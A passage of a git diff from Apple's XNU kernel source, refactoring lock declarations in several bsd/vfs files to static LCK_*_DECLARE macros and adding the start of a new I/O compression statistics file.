for interruption of I/O (e.g. via NFS), then errors. */ @@ -4259,12 +4243,12 @@ buf_biodone(buf_t bp) * they do get to run, their going to re-set * BL_WANTED and go back to sleep */ - lck_mtx_lock_spin(buf_mtxp); + lck_mtx_lock_spin(&buf_mtx); CLR(bp->b_lflags, BL_WANTED); SET(bp->b_flags, B_DONE); /* note that it's done */ - lck_mtx_unlock(buf_mtxp); + lck_mtx_unlock(&buf_mtx); wakeup(bp); } @@ -4295,13 +4279,13 @@ count_lock_queue(void) buf_t bp; int n = 0; - lck_mtx_lock_spin(buf_mtxp); + lck_mtx_lock_spin(&buf_mtx); for (bp = bufqueues[BQ_LOCKED].tqh_first; bp; bp = bp->b_freelist.tqe_next) { n++; } - lck_mtx_unlock(buf_mtxp); + lck_mtx_unlock(&buf_mtx); return n; } @@ -4338,13 +4322,13 @@ vfs_bufstats() counts[j] = 0; } - lck_mtx_lock(buf_mtxp); + lck_mtx_lock(&buf_mtx); for (bp = dp->tqh_first; bp; bp = bp->b_freelist.tqe_next) { counts[bp->b_bufsize / CLBYTES]++; count++; } - lck_mtx_unlock(buf_mtxp); + lck_mtx_unlock(&buf_mtx); printf("%s: total-%d", bname[i], count); for (j = 0; j <= MAXBSIZE / CLBYTES; j++) { @@ -4369,7 +4353,7 @@ alloc_io_buf(vnode_t vp, int priv) mount_t mp = NULL; int alloc_for_virtualdev = FALSE; - lck_mtx_lock_spin(iobuffer_mtxp); + lck_mtx_lock_spin(&iobuffer_mtxp); /* * We subject iobuf requests for diskimages to additional restrictions. @@ -4388,7 +4372,7 @@ alloc_io_buf(vnode_t vp, int priv) bufstats.bufs_iobufsleeps++; need_iobuffer = 1; - (void)msleep(&need_iobuffer, iobuffer_mtxp, + (void)msleep(&need_iobuffer, &iobuffer_mtxp, PSPIN | (PRIBIO + 1), (const char *)"alloc_io_buf (1)", NULL); } @@ -4399,7 +4383,7 @@ alloc_io_buf(vnode_t vp, int priv) bufstats.bufs_iobufsleeps++; need_iobuffer = 1; - (void)msleep(&need_iobuffer, iobuffer_mtxp, PSPIN | (PRIBIO + 1), + (void)msleep(&need_iobuffer, &iobuffer_mtxp, PSPIN | (PRIBIO + 1), (const char *)"alloc_io_buf (2)", NULL); } TAILQ_REMOVE(&iobufqueue, bp, b_freelist); @@ -4414,7 +4398,7 @@ alloc_io_buf(vnode_t vp, int priv) bufstats.bufs_iobufinuse_vdev++; } - lck_mtx_unlock(iobuffer_mtxp); + lck_mtx_unlock(&iobuffer_mtxp); /* * initialize various fields @@ -4481,7 +4465,7 @@ free_io_buf(buf_t bp) /* Zero out the bufattr and its flags before relinquishing this iobuf */ bzero(&bp->b_attr, sizeof(struct bufattr)); - lck_mtx_lock_spin(iobuffer_mtxp); + lck_mtx_lock_spin(&iobuffer_mtxp); binsheadfree(bp, &iobufqueue, -1); @@ -4511,7 +4495,7 @@ free_io_buf(buf_t bp) } } - lck_mtx_unlock(iobuffer_mtxp); + lck_mtx_unlock(&iobuffer_mtxp); if (need_wakeup) { wakeup(&need_iobuffer); @@ -4522,13 +4506,13 @@ free_io_buf(buf_t bp) void buf_list_lock(void) { - lck_mtx_lock_spin(buf_mtxp); + lck_mtx_lock_spin(&buf_mtx); } void buf_list_unlock(void) { - lck_mtx_unlock(buf_mtxp); + lck_mtx_unlock(&buf_mtx); } /* @@ -4559,10 +4543,10 @@ bcleanbuf_thread(void) int loopcnt = 0; for (;;) { - lck_mtx_lock_spin(buf_mtxp); + lck_mtx_lock_spin(&buf_mtx); while ((bp = TAILQ_FIRST(&bufqueues[BQ_LAUNDRY])) == NULL) { - (void)msleep0(&bufqueues[BQ_LAUNDRY], buf_mtxp, PRIBIO | PDROP, "blaundry", 0, (bcleanbufcontinuation)bcleanbuf_thread); + (void)msleep0(&bufqueues[BQ_LAUNDRY], &buf_mtx, PRIBIO | PDROP, "blaundry", 0, (bcleanbufcontinuation)bcleanbuf_thread); } /* @@ -4581,7 +4565,7 @@ bcleanbuf_thread(void) bp->b_tag = 10; #endif - lck_mtx_unlock(buf_mtxp); + lck_mtx_unlock(&buf_mtx); /* * do the IO */ @@ -4591,7 +4575,7 @@ bcleanbuf_thread(void) bp->b_whichq = BQ_LAUNDRY; bp->b_timestamp = buf_timestamp(); - lck_mtx_lock_spin(buf_mtxp); + lck_mtx_lock_spin(&buf_mtx); binstailfree(bp, &bufqueues[BQ_LAUNDRY], BQ_LAUNDRY); blaundrycnt++; @@ -4604,7 +4588,7 @@ bcleanbuf_thread(void) bp->b_tag = 11; #endif - lck_mtx_unlock(buf_mtxp); + lck_mtx_unlock(&buf_mtx); if (loopcnt > MAXLAUNDRY) { /* @@ -4686,24 +4670,24 @@ dump_buffer: int fs_buffer_cache_gc_register(void (* callout)(int, void *), void *context) { - lck_mtx_lock(buf_gc_callout); + lck_mtx_lock(&buf_gc_callout); for (int i = 0; i < FS_BUFFER_CACHE_GC_CALLOUTS_MAX_SIZE; i++) { if (fs_callouts[i].callout == NULL) { fs_callouts[i].callout = callout; fs_callouts[i].context = context; - lck_mtx_unlock(buf_gc_callout); + lck_mtx_unlock(&buf_gc_callout); return 0; } } - lck_mtx_unlock(buf_gc_callout); + lck_mtx_unlock(&buf_gc_callout); return ENOMEM; } int fs_buffer_cache_gc_unregister(void (* callout)(int, void *), void *context) { - lck_mtx_lock(buf_gc_callout); + lck_mtx_lock(&buf_gc_callout); for (int i = 0; i < FS_BUFFER_CACHE_GC_CALLOUTS_MAX_SIZE; i++) { if (fs_callouts[i].callout == callout && fs_callouts[i].context == context) { @@ -4711,20 +4695,20 @@ fs_buffer_cache_gc_unregister(void (* callout)(int, void *), void *context) fs_callouts[i].context = NULL; } } - lck_mtx_unlock(buf_gc_callout); + lck_mtx_unlock(&buf_gc_callout); return 0; } static void fs_buffer_cache_gc_dispatch_callouts(int all) { - lck_mtx_lock(buf_gc_callout); + lck_mtx_lock(&buf_gc_callout); for (int i = 0; i < FS_BUFFER_CACHE_GC_CALLOUTS_MAX_SIZE; i++) { if (fs_callouts[i].callout != NULL) { fs_callouts[i].callout(all, fs_callouts[i].context); } } - lck_mtx_unlock(buf_gc_callout); + lck_mtx_unlock(&buf_gc_callout); } static boolean_t @@ -4747,10 +4731,10 @@ buffer_cache_gc(int all) * for deep sleep), we only evict up to BUF_MAX_GC_BATCH_SIZE buffers * that have not been accessed in the last BUF_STALE_THRESHOLD seconds. * BUF_MAX_GC_BATCH_SIZE controls both the hold time of the global lock - * "buf_mtxp" and the length of time we spend compute bound in the GC + * "buf_mtx" and the length of time we spend compute bound in the GC * thread which calls this function */ - lck_mtx_lock(buf_mtxp); + lck_mtx_lock(&buf_mtx); do { found = 0; @@ -4803,7 +4787,7 @@ buffer_cache_gc(int all) } /* Drop lock for batch processing */ - lck_mtx_unlock(buf_mtxp); + lck_mtx_unlock(&buf_mtx); /* Wakeup and yield for laundry if need be */ if (need_wakeup) { @@ -4832,7 +4816,7 @@ buffer_cache_gc(int all) bp->b_whichq = BQ_EMPTY; BLISTNONE(bp); } - lck_mtx_lock(buf_mtxp); + lck_mtx_lock(&buf_mtx); /* Back under lock, move them all to invalid hash and clear busy */ TAILQ_FOREACH(bp, &privq, b_freelist) { @@ -4853,7 +4837,7 @@ buffer_cache_gc(int all) TAILQ_CONCAT(&bufqueues[BQ_EMPTY], &privq, b_freelist); } while (all && (found == BUF_MAX_GC_BATCH_SIZE)); - lck_mtx_unlock(buf_mtxp); + lck_mtx_unlock(&buf_mtx); fs_buffer_cache_gc_dispatch_callouts(all); @@ -4898,7 +4882,7 @@ bflushq(int whichq, mount_t mp) } restart: - lck_mtx_lock(buf_mtxp); + lck_mtx_lock(&buf_mtx); bp = TAILQ_FIRST(&bufqueues[whichq]); @@ -4923,7 +4907,7 @@ restart: total_writes++; if (buf_count >= NFLUSH) { - lck_mtx_unlock(buf_mtxp); + lck_mtx_unlock(&buf_mtx); qsort(flush_table, buf_count, sizeof(struct buf *), bp_cmp); @@ -4934,7 +4918,7 @@ restart: } } } - lck_mtx_unlock(buf_mtxp); + lck_mtx_unlock(&buf_mtx); if (buf_count > 0) { qsort(flush_table, buf_count, sizeof(struct buf *), bp_cmp); diff --git a/bsd/vfs/vfs_cache.c b/bsd/vfs/vfs_cache.c index 9d4ed9a6d..8f75a2736 100644 --- a/bsd/vfs/vfs_cache.c +++ b/bsd/vfs/vfs_cache.c @@ -145,21 +145,15 @@ struct nchstats nchstats; /* cache effectiveness statistics */ /* vars for name cache list lock */ -lck_grp_t * namecache_lck_grp; -lck_grp_attr_t * namecache_lck_grp_attr; -lck_attr_t * namecache_lck_attr; +static LCK_GRP_DECLARE(namecache_lck_grp, "Name Cache"); +static LCK_RW_DECLARE(namecache_rw_lock, &namecache_lck_grp); -lck_grp_t * strcache_lck_grp; -lck_grp_attr_t * strcache_lck_grp_attr; -lck_attr_t * strcache_lck_attr; +static LCK_GRP_DECLARE(strcache_lck_grp, "String Cache"); +static LCK_ATTR_DECLARE(strcache_lck_attr, 0, 0); +LCK_RW_DECLARE_ATTR(strtable_rw_lock, &strcache_lck_grp, &strcache_lck_attr); -lck_grp_t * rootvnode_lck_grp; -lck_grp_attr_t * rootvnode_lck_grp_attr; -lck_attr_t * rootvnode_lck_attr; - -lck_rw_t * namecache_rw_lock; -lck_rw_t * strtable_rw_lock; -lck_rw_t * rootvnode_rw_lock; +static LCK_GRP_DECLARE(rootvnode_lck_grp, "rootvnode"); +LCK_RW_DECLARE(rootvnode_rw_lock, &rootvnode_lck_grp); #define NUM_STRCACHE_LOCKS 1024 @@ -2400,8 +2394,6 @@ init_crc32(void) void nchinit(void) { - int i; - desiredNegNodes = (desiredvnodes / 10); desiredNodes = desiredvnodes + desiredNegNodes; @@ -2416,61 +2408,27 @@ nchinit(void) init_string_table(); - /* Allocate name cache lock group attribute and group */ - namecache_lck_grp_attr = lck_grp_attr_alloc_init(); - - namecache_lck_grp = lck_grp_alloc_init("Name Cache", namecache_lck_grp_attr); - - /* Allocate name cache lock attribute */ - namecache_lck_attr = lck_attr_alloc_init(); - - /* Allocate name cache lock */ - namecache_rw_lock = lck_rw_alloc_init(namecache_lck_grp, namecache_lck_attr); - - - /* Allocate string cache lock group attribute and group */ - strcache_lck_grp_attr = lck_grp_attr_alloc_init(); - - strcache_lck_grp = lck_grp_alloc_init("String Cache", strcache_lck_grp_attr); - - /* Allocate string cache lock attribute */ - strcache_lck_attr = lck_attr_alloc_init(); - - /* Allocate string cache lock */ - strtable_rw_lock = lck_rw_alloc_init(strcache_lck_grp, strcache_lck_attr); - - for (i = 0; i < NUM_STRCACHE_LOCKS; i++) { - lck_mtx_init(&strcache_mtx_locks[i], strcache_lck_grp, strcache_lck_attr); + for (int i = 0; i < NUM_STRCACHE_LOCKS; i++) { + lck_mtx_init(&strcache_mtx_locks[i], &strcache_lck_grp, &strcache_lck_attr); } - - /* Allocate root vnode lock group attribute and group */ - rootvnode_lck_grp_attr = lck_grp_attr_alloc_init(); - - rootvnode_lck_grp = lck_grp_alloc_init("rootvnode", rootvnode_lck_grp_attr); - - /* Allocate rootvnode lock attribute */ - rootvnode_lck_attr = lck_attr_alloc_init(); - - /* Allocate rootvnode lock */ - rootvnode_rw_lock = lck_rw_alloc_init(rootvnode_lck_grp, rootvnode_lck_attr); } void name_cache_lock_shared(void) { - lck_rw_lock_shared(namecache_rw_lock); + lck_rw_lock_shared(&namecache_rw_lock); } void name_cache_lock(void) { - lck_rw_lock_exclusive(namecache_rw_lock); + lck_rw_lock_exclusive(&namecache_rw_lock); } void name_cache_unlock(void) { - lck_rw_done(namecache_rw_lock); + lck_rw_done(&namecache_rw_lock); } @@ -2718,10 +2676,10 @@ resize_string_ref_table(void) * the lock exclusively in case some other thread * beat us to the punch */ - lck_rw_lock_exclusive(strtable_rw_lock); + lck_rw_lock_exclusive(&strtable_rw_lock); if (4 * filled_buckets < ((string_table_mask + 1) * 3)) { - lck_rw_done(strtable_rw_lock); + lck_rw_done(&strtable_rw_lock); return; } assert(string_table_mask < INT32_MAX); @@ -2729,7 +2687,7 @@ resize_string_ref_table(void) if (new_table == NULL) { printf("failed to resize the hash table.\n"); - lck_rw_done(strtable_rw_lock); + lck_rw_done(&strtable_rw_lock); return; } @@ -2755,7 +2713,7 @@ resize_string_ref_table(void) LIST_INSERT_HEAD(head, entry, hash_chain); } } - lck_rw_done(strtable_rw_lock); + lck_rw_done(&strtable_rw_lock); FREE(old_table, M_CACHE); } @@ -2806,17 +2764,17 @@ add_name_internal(const char *name, uint32_t len, u_int hashval, boolean_t need_ * if someone else decides to grow the pool they * will take this lock exclusively */ - lck_rw_lock_shared(strtable_rw_lock); + lck_rw_lock_shared(&strtable_rw_lock); /* * If the table gets more than 3/4 full, resize it */ if (4 * filled_buckets >= ((string_table_mask + 1) * 3)) { - lck_rw_done(strtable_rw_lock); + lck_rw_done(&strtable_rw_lock); resize_string_ref_table(); - lck_rw_lock_shared(strtable_rw_lock); + lck_rw_lock_shared(&strtable_rw_lock); } hash_index = hashval & string_table_mask; lock_index = hash_index % NUM_STRCACHE_LOCKS; @@ -2853,7 +2811,7 @@ add_name_internal(const char *name, uint32_t len, u_int hashval, boolean_t need_ } lck_mtx_unlock(&strcache_mtx_locks[lock_index]); - lck_rw_done(strtable_rw_lock); + lck_rw_done(&strtable_rw_lock); return (const char *)entry->str; } @@ -2876,7 +2834,7 @@ vfs_removename(const char *nameref) * if someone else decides to grow the pool they * will take this lock exclusively */ - lck_rw_lock_shared(strtable_rw_lock); + lck_rw_lock_shared(&strtable_rw_lock); /* * must compute the head behind the table lock * since the size and location of the table @@ -2907,7 +2865,7 @@ vfs_removename(const char *nameref) } } lck_mtx_unlock(&strcache_mtx_locks[lock_index]); - lck_rw_done(strtable_rw_lock); + lck_rw_done(&strtable_rw_lock); kheap_free_addr(KHEAP_DEFAULT, entry); @@ -2923,7 +2881,7 @@ dump_string_table(void) string_t *entry; u_long i; - lck_rw_lock_shared(strtable_rw_lock); + lck_rw_lock_shared(&strtable_rw_lock); for (i = 0; i <= string_table_mask; i++) { head = &string_ref_table[i]; @@ -2931,6 +2889,6 @@ dump_string_table(void) printf("%6d - %s\n", entry->refcount, entry->str); } } - lck_rw_done(strtable_rw_lock); + lck_rw_done(&strtable_rw_lock); } #endif /* DUMP_STRING_TABLE */ diff --git a/bsd/vfs/vfs_fsevents.c b/bsd/vfs/vfs_fsevents.c index fb8e519e2..2507a242c 100644 --- a/bsd/vfs/vfs_fsevents.c +++ b/bsd/vfs/vfs_fsevents.c @@ -152,16 +152,18 @@ static void fsevents_wakeup(fs_event_watcher *watcher); // // Locks // -static lck_grp_attr_t * fsevent_group_attr; -static lck_attr_t * fsevent_lock_attr; -static lck_grp_t * fsevent_mutex_group; +static LCK_ATTR_DECLARE(fsevent_lock_attr, 0, 0); +static LCK_GRP_DECLARE(fsevent_mutex_group, "fsevent-mutex"); +static LCK_GRP_DECLARE(fsevent_rw_group, "fsevent-rw"); -static lck_grp_t * fsevent_rw_group; - -static lck_rw_t event_handling_lock; // handles locking for event manipulation and recycling -static lck_mtx_t watch_table_lock; -static lck_mtx_t event_buf_lock; -static lck_mtx_t event_writer_lock; +static LCK_RW_DECLARE_ATTR(event_handling_lock, // handles locking for event manipulation and recycling + &fsevent_rw_group, &fsevent_lock_attr); +static LCK_MTX_DECLARE_ATTR(watch_table_lock, + &fsevent_mutex_group, &fsevent_lock_attr); +static LCK_MTX_DECLARE_ATTR(event_buf_lock, + &fsevent_mutex_group, &fsevent_lock_attr); +static LCK_MTX_DECLARE_ATTR(event_writer_lock, + &fsevent_mutex_group, &fsevent_lock_attr); /* Explicitly declare qsort so compiler doesn't complain */ @@ -204,29 +206,16 @@ fsevents_internal_init(void) memset(watcher_table, 0, sizeof(watcher_table)); - fsevent_lock_attr = lck_attr_alloc_init(); - fsevent_group_attr = lck_grp_attr_alloc_init(); - fsevent_mutex_group = lck_grp_alloc_init("fsevent-mutex", fsevent_group_attr); - fsevent_rw_group = lck_grp_alloc_init("fsevent-rw", fsevent_group_attr); - - lck_mtx_init(&watch_table_lock, fsevent_mutex_group, fsevent_lock_attr); - lck_mtx_init(&event_buf_lock, fsevent_mutex_group, fsevent_lock_attr); - lck_mtx_init(&event_writer_lock, fsevent_mutex_group, fsevent_lock_attr); - - lck_rw_init(&event_handling_lock, fsevent_rw_group, fsevent_lock_attr); - PE_get_default("kern.maxkfsevents", &max_kfs_events, sizeof(max_kfs_events)); event_zone = zone_create_ext("fs-event-buf", sizeof(kfs_event), ZC_NOGC | ZC_NOCALLOUT, ZONE_ID_ANY, ^(zone_t z) { // mark the zone as exhaustible so that it will not // ever grow beyond what we initially filled it with - zone_set_exhaustible(z, max_kfs_events * sizeof(kfs_event)); + zone_set_exhaustible(z, max_kfs_events); }); - if (zfill(event_zone, max_kfs_events) < max_kfs_events) { - printf("fsevents: failed to pre-fill the event zone.\n"); - } + zone_fill_initially(event_zone, max_kfs_events); } static void diff --git a/bsd/vfs/vfs_fslog.c b/bsd/vfs/vfs_fslog.c index 4ba18afa4..366e5170a 100644 --- a/bsd/vfs/vfs_fslog.c +++ b/bsd/vfs/vfs_fslog.c @@ -111,15 +111,8 @@ fslog_extmod_msgtracer(proc_t caller, proc_t target) * Log information about floating point exception handling */ -static lck_mtx_t fpxlock; - -void -fpxlog_init(void) -{ - lck_grp_attr_t *lck_grp_attr = lck_grp_attr_alloc_init(); - lck_grp_t *lck_grp = lck_grp_alloc_init("fpx", lck_grp_attr); - lck_mtx_init(&fpxlock, lck_grp, LCK_ATTR_NULL); -} +static LCK_GRP_DECLARE(fpxlock_grp, "fpx"); +static LCK_MTX_DECLARE(fpxlock, &fpxlock_grp); struct fpx_event { uuid_t fe_uuid; @@ -269,11 +262,4 @@ fpxlog( NULL); } -#else - -void -fpxlog_init(void) -{ -} - #endif /* __x86_64__ */ diff --git a/bsd/vfs/vfs_init.c b/bsd/vfs/vfs_init.c index 441d9269f..99f99e44e 100644 --- a/bsd/vfs/vfs_init.c +++ b/bsd/vfs/vfs_init.c @@ -270,53 +270,23 @@ vfs_op_init(void) extern struct vnodeops dead_vnodeops; extern struct vnodeops spec_vnodeops; -/* vars for vnode lock */ -lck_grp_t * vnode_lck_grp; -lck_grp_attr_t * vnode_lck_grp_attr; -lck_attr_t * vnode_lck_attr; - -#if CONFIG_TRIGGERS -/* vars for vnode trigger resolver */ -lck_grp_t * trigger_vnode_lck_grp; -lck_grp_attr_t * trigger_vnode_lck_grp_attr; -lck_attr_t * trigger_vnode_lck_attr; -#endif - -lck_grp_t * fd_vn_lck_grp; -lck_grp_attr_t * fd_vn_lck_grp_attr; -lck_attr_t * fd_vn_lck_attr; - /* vars for vnode list lock */ -lck_grp_t * vnode_list_lck_grp; -lck_grp_attr_t * vnode_list_lck_grp_attr; -lck_attr_t * vnode_list_lck_attr; -lck_spin_t * vnode_list_spin_lock; -lck_mtx_t * spechash_mtx_lock; - -/* vars for vfsconf lock */ -lck_grp_t * fsconf_lck_grp; -lck_grp_attr_t * fsconf_lck_grp_attr; -lck_attr_t * fsconf_lck_attr; - +static LCK_GRP_DECLARE(vnode_list_lck_grp, "vnode list"); +static LCK_ATTR_DECLARE(vnode_list_lck_attr, 0, 0); +static LCK_SPIN_DECLARE_ATTR(vnode_list_spin_lock, + &vnode_list_lck_grp, &vnode_list_lck_attr); +static LCK_MTX_DECLARE_ATTR(spechash_mtx_lock, + &vnode_list_lck_grp, &vnode_list_lck_attr); +LCK_MTX_DECLARE_ATTR(pkg_extensions_lck, + &vnode_list_lck_grp, &vnode_list_lck_attr); /* vars for mount lock */ -lck_grp_t * mnt_lck_grp; -lck_grp_attr_t * mnt_lck_grp_attr; -lck_attr_t * mnt_lck_attr; +static LCK_GRP_DECLARE(mnt_lck_grp, "mount"); +static LCK_ATTR_DECLARE(mnt_lck_attr, 0, 0); /* vars for mount list lock */ -lck_grp_t * mnt_list_lck_grp; -lck_grp_attr_t * mnt_list_lck_grp_attr; -lck_attr_t * mnt_list_lck_attr; -lck_mtx_t * mnt_list_mtx_lock; - -/* vars for sync mutex */ -lck_grp_t * sync_mtx_lck_grp; -lck_grp_attr_t * sync_mtx_lck_grp_attr; -lck_attr_t * sync_mtx_lck_attr; -lck_mtx_t * sync_mtx_lck; - -lck_mtx_t *pkg_extensions_lck; +static LCK_GRP_DECLARE(mnt_list_lck_grp, "mount list"); +LCK_MTX_DECLARE(mnt_list_mtx_lock, &mnt_list_lck_grp); struct mount * dead_mountp; @@ -330,77 +300,6 @@ vfsinit(void) int i, maxtypenum; struct mount * mp; - /* Allocate vnode list lock group attribute and group */ - vnode_list_lck_grp_attr = lck_grp_attr_alloc_init(); - - vnode_list_lck_grp = lck_grp_alloc_init("vnode list", vnode_list_lck_grp_attr); - - /* Allocate vnode list lock attribute */ - vnode_list_lck_attr = lck_attr_alloc_init(); - - /* Allocate vnode list lock */ - vnode_list_spin_lock = lck_spin_alloc_init(vnode_list_lck_grp, vnode_list_lck_attr); - - /* Allocate spec hash list lock */ - spechash_mtx_lock = lck_mtx_alloc_init(vnode_list_lck_grp, vnode_list_lck_attr); - - /* Allocate the package extensions table lock */ - pkg_extensions_lck = lck_mtx_alloc_init(vnode_list_lck_grp, vnode_list_lck_attr); - - /* allocate vnode lock group attribute and group */ - vnode_lck_grp_attr = lck_grp_attr_alloc_init(); - - vnode_lck_grp = lck_grp_alloc_init("vnode", vnode_lck_grp_attr); - - /* Allocate vnode lock attribute */ - vnode_lck_attr = lck_attr_alloc_init(); - -#if CONFIG_TRIGGERS - trigger_vnode_lck_grp_attr = lck_grp_attr_alloc_init(); - trigger_vnode_lck_grp = lck_grp_alloc_init("trigger_vnode", trigger_vnode_lck_grp_attr); - trigger_vnode_lck_attr = lck_attr_alloc_init(); -#endif - /* Allocate per fd vnode data lock attribute and group */ - fd_vn_lck_grp_attr = lck_grp_attr_alloc_init(); - fd_vn_lck_grp = lck_grp_alloc_init("fd_vnode_data", fd_vn_lck_grp_attr); - fd_vn_lck_attr = lck_attr_alloc_init(); - - /* Allocate fs config lock group attribute and group */ - fsconf_lck_grp_attr = lck_grp_attr_alloc_init(); - - fsconf_lck_grp = lck_grp_alloc_init("fs conf", fsconf_lck_grp_attr); - - /* Allocate fs config lock attribute */ - fsconf_lck_attr = lck_attr_alloc_init(); - - /* Allocate mount point related lock structures */ - - /* Allocate mount list lock group attribute and group */ - mnt_list_lck_grp_attr = lck_grp_attr_alloc_init(); - - mnt_list_lck_grp = lck_grp_alloc_init("mount list", mnt_list_lck_grp_attr); - - /* Allocate mount list lock attribute */ - mnt_list_lck_attr = lck_attr_alloc_init(); - - /* Allocate mount list lock */ - mnt_list_mtx_lock = lck_mtx_alloc_init(mnt_list_lck_grp, mnt_list_lck_attr); - - - /* allocate mount lock group attribute and group */ - mnt_lck_grp_attr = lck_grp_attr_alloc_init(); - - mnt_lck_grp = lck_grp_alloc_init("mount", mnt_lck_grp_attr); - - /* Allocate mount lock attribute */ - mnt_lck_attr = lck_attr_alloc_init(); - - /* Allocate sync lock */ - sync_mtx_lck_grp_attr = lck_grp_attr_alloc_init(); - sync_mtx_lck_grp = lck_grp_alloc_init("sync thread", sync_mtx_lck_grp_attr); - sync_mtx_lck_attr = lck_attr_alloc_init(); - sync_mtx_lck = lck_mtx_alloc_init(sync_mtx_lck_grp, sync_mtx_lck_attr); - /* * Initialize the vnode table */ @@ -471,13 +370,6 @@ vfsinit(void) */ vnode_authorize_init(); - /* - * Initialiize the quota system. - */ -#if QUOTA - dqinit(); -#endif - /* * create a mount point for dead vnodes */ @@ -518,43 +410,43 @@ vfsinit(void) void vnode_list_lock(void) { - lck_spin_lock_grp(vnode_list_spin_lock, vnode_list_lck_grp); + lck_spin_lock_grp(&vnode_list_spin_lock, &vnode_list_lck_grp); } void vnode_list_unlock(void) { - lck_spin_unlock(vnode_list_spin_lock); + lck_spin_unlock(&vnode_list_spin_lock); } void mount_list_lock(void) { - lck_mtx_lock(mnt_list_mtx_lock); + lck_mtx_lock(&mnt_list_mtx_lock); } void mount_list_unlock(void) { - lck_mtx_unlock(mnt_list_mtx_lock); + lck_mtx_unlock(&mnt_list_mtx_lock); } void mount_lock_init(mount_t mp) { - lck_mtx_init(&mp->mnt_mlock, mnt_lck_grp, mnt_lck_attr); - lck_mtx_init(&mp->mnt_iter_lock, mnt_lck_grp, mnt_lck_attr); - lck_mtx_init(&mp->mnt_renamelock, mnt_lck_grp, mnt_lck_attr); - lck_rw_init(&mp->mnt_rwlock, mnt_lck_grp, mnt_lck_attr); + lck_mtx_init(&mp->mnt_mlock, &mnt_lck_grp, &mnt_lck_attr); + lck_mtx_init(&mp->mnt_iter_lock, &mnt_lck_grp, &mnt_lck_attr); + lck_mtx_init(&mp->mnt_renamelock, &mnt_lck_grp, &mnt_lck_attr); + lck_rw_init(&mp->mnt_rwlock, &mnt_lck_grp, &mnt_lck_attr); } void mount_lock_destroy(mount_t mp) { - lck_mtx_destroy(&mp->mnt_mlock, mnt_lck_grp); - lck_mtx_destroy(&mp->mnt_iter_lock, mnt_lck_grp); - lck_mtx_destroy(&mp->mnt_renamelock, mnt_lck_grp); - lck_rw_destroy(&mp->mnt_rwlock, mnt_lck_grp); + lck_mtx_destroy(&mp->mnt_mlock, &mnt_lck_grp); + lck_mtx_destroy(&mp->mnt_iter_lock, &mnt_lck_grp); + lck_mtx_destroy(&mp->mnt_renamelock, &mnt_lck_grp); + lck_rw_destroy(&mp->mnt_rwlock, &mnt_lck_grp); } @@ -676,7 +568,7 @@ vfstable_del(struct vfstable * vtbl) struct vfstable *vcdelp; #if DEBUG - lck_mtx_assert(mnt_list_mtx_lock, LCK_MTX_ASSERT_OWNED); + lck_mtx_assert(&mnt_list_mtx_lock, LCK_MTX_ASSERT_OWNED); #endif /* DEBUG */ /* @@ -727,7 +619,7 @@ vfstable_del(struct vfstable * vtbl) } #if DEBUG - lck_mtx_assert(mnt_list_mtx_lock, LCK_MTX_ASSERT_OWNED); + lck_mtx_assert(&mnt_list_mtx_lock, LCK_MTX_ASSERT_OWNED); #endif /* DEBUG */ return 0; @@ -736,11 +628,11 @@ vfstable_del(struct vfstable * vtbl) void SPECHASH_LOCK(void) { - lck_mtx_lock(spechash_mtx_lock); + lck_mtx_lock(&spechash_mtx_lock); } void SPECHASH_UNLOCK(void) { - lck_mtx_unlock(spechash_mtx_lock); + lck_mtx_unlock(&spechash_mtx_lock); } diff --git a/bsd/vfs/vfs_io_compression_stats.c b/bsd/vfs/vfs_io_compression_stats.c new file mode 100644 index 000000000..d2fee5f2c --- /dev/null +++ b/bsd/vfs/vfs_io_compression_stats.c @@ -0,0 +1,738 @@ +/* + * Copyright (c) 2020 Apple Inc. All rights reserved. + * + * @APPLE_OSREFERENCE_LICENSE_HEADER_START@ + * + * This file contains Original Code and/or Modifications of Original Code + * as defined in and that are subject to the Apple Public Source License + * Version 2.0 (the 'License'). You may not use this file except in + * compliance with the License. The rights granted to you under the License + * may not be used to create, or enable the creation or redistribution of, + * unlawful or unlicensed copies of an Apple operating system, or to + * circumvent, violate, or enable the circumvention or violation of, any + * terms of an Apple operating system software license agreement. + * + * Please obtain a copy of the License at + * http://www.opensource.apple.com/apsl/ and read it before using this file. + * + * The Original Code and all software distributed under the License are + * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER + * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES, + * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY, + * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT. + * Please see the License for the specific language governing rights and + * limitations under the License. + * + * @APPLE_OSREFERENCE_LICENSE_HEADER_END@ + */ + +#include +#include +#include + +#include +#include +#include +#include +#include + +#include +#include +#include +#include +#include + +#include + +#include +#include +#include + + +int io_compression_stats_enable = 0; +int io_compression_stats_block_size = IO_COMPRESSION_STATS_DEFAULT_BLOCK_SIZE; + +#define LZ4_SCRATCH_ALIGN (64) +typedef struct { + uint8_t lz4state[lz4_encode_scratch_size]__attribute((aligned(LZ4_SCRATCH_ALIGN))); +} lz4_encode_scratch_t; + +lz4_encode_scratch_t **per_cpu_scratch_buf; +uint8_t **per_cpu_compression_buf; +uint32_t io_compression_stats_cpu_count; +char *vnpath_scratch_buf; + +LCK_GRP_DECLARE(io_compression_stats_lckgrp, "io_compression_stats"); +LCK_RW_DECLARE(io_compression_stats_lock, &io_compression_stats_lckgrp); +LCK_MTX_DECLARE(iocs_store_buffer_lock, &io_compression_stats_lckgrp); + +typedef enum io_compression_stats_allocate_type { + IO_COMPRESSION_STATS_NEW_ALLOC = 0, + IO_COMPRESSION_STATS_RESIZE = 1 +} io_compression_stats_alloc_type_t; + +static void io_compression_stats_deallocate_compression_buffers(void); + +struct iocs_store_buffer iocs_store_buffer = { + .buffer = 0, + .current_position = 0, + .marked_point = 0 +}; + +int iocs_sb_bytes_since_last_mark = 0; +int iocs_sb_bytes_since_last_notification = 0; + +ZONE_DECLARE(io_compression_stats_zone, "io_compression_stats", + sizeof(struct io_compression_stats), ZC_NOENCRYPT | ZC_NOGC | ZC_ZFREE_CLEARMEM); + +static int +io_compression_stats_allocate_compression_buffers(io_compression_stats_alloc_type_t alloc_type, uint32_t block_size) +{ + int err = 0; + host_basic_info_data_t hinfo; + mach_msg_type_number_t count = HOST_BASIC_INFO_COUNT; +#define BSD_HOST 1 + host_info((host_t)BSD_HOST, HOST_BASIC_INFO, (host_info_t)&hinfo, &count); + + io_compression_stats_cpu_count = hinfo.max_cpus; + if (alloc_type == IO_COMPRESSION_STATS_NEW_ALLOC) { + assert(per_cpu_scratch_buf == NULL); + per_cpu_scratch_buf = 